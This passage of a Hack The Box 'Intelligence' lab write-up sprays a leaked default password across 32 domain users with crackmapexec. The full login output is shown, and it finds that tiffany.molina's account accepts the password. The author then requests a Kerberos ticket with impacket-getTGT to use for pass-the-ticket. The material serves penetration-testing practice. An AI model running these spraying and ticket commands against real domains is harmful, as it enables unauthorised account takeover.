Password Spraying
Utilizing the custom Python script, I’ve pinpointed a PDF file that holds a CLEARTEXT password; NewIntelligenceCorpUser9876
It is believed to be a default password for a new user in the target domain. Although the ownership of this CLEARTEXT password is yet to be determined, I could potentially carry out a password spraying attack to ascertain the new user associated with the default password.
Up until now, I have gathered a number of valid domain users from 2 difference sources;
users_from_naming_convention.txt: Exploiting the suspected username convention that the target domain usescreator_users.txt: Metadata of extracted PDF files
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ cat users_from_naming_convention.txt creator_users.txt | sort -u | tr -d [:blank:] > merged.txt I will first sort and merge those two files with valid domain users
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ wc -l merged.txt
32 merged.txtThe result is a total of 32 valid domain users
Fail with Kerberos
Unfortunately, it doesn’t seem to be working with Kerberos.
I will opt out to the NTLM authentication.
NTLM
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ crackmapexec smb $IP -u merged.txt -p 'NewIntelligenceCorpUser9876' --continue-on-success
smb 10.10.10.248 445 dc [*] windows 10.0 build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
smb 10.10.10.248 445 dc [-] intelligence.htb\anita.roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\brian.baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\brian.morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\daniel.shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\danny.matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\darryl.harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\david.mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\david.reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\david.wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\ian.duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\jason.patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\jason.wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\jennifer.thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\jessica.moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\joel.crawford:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\john.coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\jose.williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\kaitlyn.zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\kelly.long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\laura.lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\nicole.brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\richard.williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\samuel.richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\scott.scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\stephanie.young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\teresa.williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\thomas.hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\thomas.valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [+] intelligence.htb\tiffany.molina:NewIntelligenceCorpUser9876
smb 10.10.10.248 445 dc [-] intelligence.htb\travis.evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\veronica.patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
smb 10.10.10.248 445 dc [-] intelligence.htb\william.lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE Performing a password spraying attack with crackmapexec for NTLM authentication and the result shows a single new user (owner)
The default password, NewIntelligenceCorpUser9876, belongs to the tiffany.molina user
I will attempt to re-validate against the target KDC
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ impacket-getTGT intelligence.htb/tiffany.molina@dc.intelligence.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: NewIntelligenceCorpUser9876
[*] Saving ticket in tiffany.molina@dc.intelligence.htb.ccacheVALIDATED
TGT for the tiffany.molina user saved for thepass_the_ticket OPSEC